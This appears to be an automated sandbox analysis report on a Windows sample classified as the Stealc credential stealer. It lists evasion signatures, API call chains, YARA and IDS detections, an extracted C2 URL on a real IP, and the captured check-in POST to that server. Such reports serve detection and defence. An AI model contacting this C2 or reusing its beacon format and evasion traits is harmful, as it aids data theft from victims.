Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1560661
MD5: fcab8c77edd9c235497e92d29b6c028d
SHA1: 5bea36fb1edcb3801f5f7d5dacda5d0ffd5ac020
SHA256: ece1bbf67dbee347fca668310d9fcf40f8e736d56bc81fb97e5f12f0d08ab3cb
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 5480 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FCAB8C77EDD9C235497E92D29B6C028D)
  • cleanup
Threat name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings whose development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, as well as other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Extracted malware configuration:
{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Yara matches (Source / Rule / Description / Author):
  • dump.pcap / JoeSecurity_Stealc_1 / Yara detected Stealc / Joe Security
  • 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp / JoeSecurity_Stealc / Yara detected Stealc / Joe Security
  • 00000000.00000003.2238343431.0000000004D50000.00000004.00001000.00020000.00000000.sdmp / JoeSecurity_Stealc / Yara detected Stealc / Joe Security
  • 00000000.00000002.2325828976.0000000000F78000.00000004.00000020.00020000.00000000.sdmp / JoeSecurity_Stealc / Yara detected Stealc / Joe Security
  • Process Memory Space: file.exe PID: 5480 / JoeSecurity_PowershellDownloadAndExecute / Yara detected Powershell download and execute / Joe Security
  • Process Memory Space: file.exe PID: 5480 / JoeSecurity_Stealc / Yara detected Stealc / Joe Security

No Sigma rule has matched

Suricata alerts (Timestamp / SID / Severity / Classtype / Source / Destination / Protocol):
  • 2024-11-22T05:16:23.817626+0100 / 2044243 / 1 / Malware Command and Control Activity Detected / 192.168.2.6:49726 / 185.215.113.206:80 / TCP


              AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.206/c4becf79229cb002.phpK | Avira URL Cloud: Label: malware
Source: file.exe.5480.0.memstrmin | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source: http://185.215.113.206/c4becf79229cb002.phpK | Virustotal: Detection: 18%
Source: file.exe | ReversingLabs: Detection: 44%
Source: file.exe | Virustotal: Detection: 51%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00394C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00394C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B40B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_003B40B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003960D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_003960D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A6960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_003A6960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0039EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_0039EA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00399B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00399B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A6B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_003A6B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00399B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00399B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00397750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00397750
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003A18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003A3910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003AE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003AE210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003A1269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003A1250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003A4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003A4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003A23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0039DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0039DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_003A2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0039DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0039DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003ACBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003ACBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003AD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003AD530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003ADD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_003ADD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003916B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003916B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003916A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003916A0

              Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49726 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/c4becf79229cb002.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAKJDHIEBFIIDGDGDBAHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 37 39 43 39 43 43 31 41 37 33 31 35 34 36 30 38 36 36 30 33 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 2d 2d 0d 0a Data Ascii: ------HDAKJDHIEBFIIDGDGDBAContent-Disposition: form-data; name="hwid"7779C9CC1A731546086603------HDAKJDHIEBFIIDGDGDBAContent-Disposition: form-data; name="build"mars------HDAKJDHIEBFIIDGDGDBA--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00394C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00394C50
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAKJDHIEBFIIDGDGDBAHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 37 39 43 39 43 43 31 41 37 33 31 35 34 36 30 38 36 36 30 33 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 2d 2d 0d 0a Data Ascii: ------HDAKJDHIEBFIIDGDGDBAContent-Disposition: form-data; name="hwid"7779C9CC1A731546086603------HDAKJDHIEBFIIDGDGDBAContent-Disposition: form-data; name="build"mars------HDAKJDHIEBFIIDGDGDBA--
Source: file.exe, 00000000.00000002.2325828976.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2325828976.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2325828976.0000000000F78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2325828976.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/B
Source: file.exe, 00000000.00000002.2325828976.0000000000F78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.2325828976.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php#
Source: file.exe, 00000000.00000002.2325828976.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: file.exe, 00000000.00000002.2325828976.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpK
Source: file.exe, 00000000.00000002.2325828976.0000000000FC2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/p
Source: file.exe, 00000000.00000002.2325828976.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206~
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00399770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop, 0_2_00399770

              System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00749810 0_2_00749810
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B48B0 0_2_003B48B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0065914D 0_2_0065914D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007CD946 0_2_007CD946
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0074B9DF 0_2_0074B9DF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0067122C 0_2_0067122C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007412C1 0_2_007412C1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00746ABE 0_2_00746ABE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0073C2A5 0_2_0073C2A5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00698B73 0_2_00698B73
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007453D3 0_2_007453D3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0074CCFC 0_2_0074CCFC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006A449A 0_2_006A449A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00742D28 0_2_00742D28
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0073DDE4 0_2_0073DDE4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00750DB0 0_2_00750DB0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0074E785 0_2_0074E785
